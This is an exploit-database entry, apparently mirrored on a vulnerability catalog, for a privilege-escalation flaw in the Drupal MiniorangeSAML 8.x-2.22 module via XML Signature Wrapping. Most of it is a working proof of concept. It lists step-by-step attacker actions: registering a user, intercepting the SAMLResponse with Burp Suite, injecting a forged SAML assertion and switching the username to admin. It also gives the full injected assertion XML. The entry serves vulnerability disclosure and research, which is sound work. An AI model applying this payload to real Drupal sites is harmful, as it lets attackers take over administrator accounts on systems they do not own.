Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation

🗓️ 01 Oct 2021 00:00:00Reported by Cristian \'void\' GiustiniType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 269 Views

Drupal Module MiniorangeSAML 8.x-2.22 - XML Signature Wrapping Privilege Escalatio

Code
# Exploit Title: Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation via XML Signature Wrapping
# Date: 09/07/2021
# Exploit Author: Cristian 'void' Giustini
# Vendor Homepage: https://www.miniorange.com/
# Software Link: https://www.drupal.org/project/miniorange_saml
# Version: 8.x-2.22 (REQUIRED)
# Tested on: Linux Debian (PHP 8.0.7 with Apache/2.4.38)
# Original article:  https://blog.hacktivesecurity.com/index.php/2021/07/09/sa-contrib-2021-036-notsosaml-privilege-escalation-via-xml-signature-wrapping-on-minorangesaml-drupal-plugin/
# Drupal Security Advisory URL: https://www.drupal.org/sa-contrib-2021-036

---

The MiniorangeSAML Drupal Plugin v. 8.x-2.22 is vulnerable to XML 
Signature Wrapping Attacks that could allows an attacker to perform 
privilege escalation attacks.

In order to exploit the vulnerability, the plugin must be configured 
with the "Either SAML reponse or SAML assertion must be signed" options 
enabled and an empty "x509 certificate".

Administrator point of view:

- Install a Drupal version (for the PoC the version 9.1.10 has been used)

- Configure an external SSO system like Auth0

- Configure the plugin with the Auth0 provider by checking the "Either 
SAML response or SAML assertion must be signed" and empty "x509 certificate"


Attacker point of view:

- Register a normal user on the website

- Perform a login

- Intercept the request with Burp Suite and decode the SAMLResponse 
parameter

- Inject an additional <Saml:Assertion> object before the original one 
(example here: 
https://gist.github.com/voidz0r/30c0fb7be79abf8c79d1be9d424c9e3b#file-injected_object-xml) 
(SAMLRaider Burp extension, XSW3 payload)

<saml:Assertion ID="_evil_assertion_ID" IssueInstant="2021-06-23T21:04:01.551Z" Version="2.0"
 xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">
 <saml:Issuer>urn:miniorange-research.eu.auth0.com</saml:Issuer>
 <saml:Subject>
 <saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified">admin</saml:NameID>
 <saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
 <saml:SubjectConfirmationData InResponseTo="_f1e26bb0bd40be366c543e2c3fe0215747f40dadbb" NotOnOrAfter="2021-06-23T22:04:01.551Z" Recipient="http://localhost:8080/samlassertion"/>
 </saml:SubjectConfirmation>
 </saml:Subject>
 <saml:Conditions NotBefore="2021-06-23T21:04:01.551Z" NotOnOrAfter="2021-06-23T22:04:01.551Z">
 <saml:AudienceRestriction>
 <saml:Audience>http://localhost:8080</saml:Audience>
 </saml:AudienceRestriction>
 </saml:Conditions>
 <saml:AuthnStatement AuthnInstant="2021-06-23T21:04:01.551Z" SessionIndex="_WWwvhpmMv5eJI4bwPdsPAiasFpTH8gt_">
 <saml:AuthnContext> <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:unspecified</saml:AuthnContextClassRef>
 </saml:AuthnContext>
 </saml:AuthnStatement>
 <saml:AttributeStatement xmlns:xs="http://www.w3.org/2001/XMLSchema"
 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
 <saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
 <saml:AttributeValue xsi:type="xs:string">admin</saml:AttributeValue>
 </saml:Attribute>
 <saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
 <saml:AttributeValue xsi:type="xs:string">[email protected]</saml:AttributeValue>
 </saml:Attribute>
 <saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
 <saml:AttributeValue xsi:type="xs:string">[email protected]</saml:AttributeValue>
 </saml:Attribute>
 <saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
 <saml:AttributeValue xsi:type="xs:string">[email protected]</saml:AttributeValue>
 </saml:Attribute>
 <saml:Attribute Name="http://schemas.auth0.com/identities/default/connection" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
 <saml:AttributeValue xsi:type="xs:string">Username-Password-Authentication</saml:AttributeValue>
 </saml:Attribute>
 <saml:Attribute Name="http://schemas.auth0.com/identities/default/provider" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
 <saml:AttributeValue xsi:type="xs:string">auth0</saml:AttributeValue>
 </saml:Attribute>
 <saml:Attribute Name="http://schemas.auth0.com/identities/default/isSocial" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
 <saml:AttributeValue xsi:type="xs:boolean">false</saml:AttributeValue>
 </saml:Attribute>
 <saml:Attribute Name="http://schemas.auth0.com/clientID" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
 <saml:AttributeValue xsi:type="xs:string">8bbK44pPnBAqzN49pSuwmgdhgsZavkNI</saml:AttributeValue>
 </saml:Attribute>
 <saml:Attribute Name="http://schemas.auth0.com/created_at" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
 <saml:AttributeValue xsi:type="xs:anyType">Wed Jun 23 2021 21:01:51 GMT+0000 (Coordinated Universal Time)</saml:AttributeValue>
 </saml:Attribute>
 <saml:Attribute Name="http://schemas.auth0.com/email_verified" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
 <saml:AttributeValue xsi:type="xs:boolean">false</saml:AttributeValue>
 </saml:Attribute>
 <saml:Attribute Name="http://schemas.auth0.com/nickname" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
 <saml:AttributeValue xsi:type="xs:string">test</saml:AttributeValue>
 </saml:Attribute>
 <saml:Attribute Name="http://schemas.auth0.com/picture" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
 <saml:AttributeValue xsi:type="xs:string">https://s.gravatar.com/avatar/55502f40dc8b7c769880b10874abc9d0?s=480&r=pg&d=https%3A%2F%2Fcdn.auth0.com%2Favatars%2Fte.png</saml:AttributeValue>
 </saml:Attribute>
 <saml:Attribute Name="http://schemas.auth0.com/updated_at" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">

 <saml:AttributeValue xsi:type="xs:anyType">Wed Jun 23 2021 21:01:51 GMT+0000 (Coordinated Universal Time)</saml:AttributeValue>

 </saml:Attribute>

 </saml:AttributeStatement>

</saml:Assertion>

- Replace the username with one with higher privileges (like admin)

- Submit the request

- Successful exploitation

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Oct 2021 00:00Current
7.4High risk
Vulners AI Score7.4
drupalminiorangesamlprivilege escalationxml signature wrappingvulnerabilityexploitssoauth0burp suiteinjectionsecurity advisory
269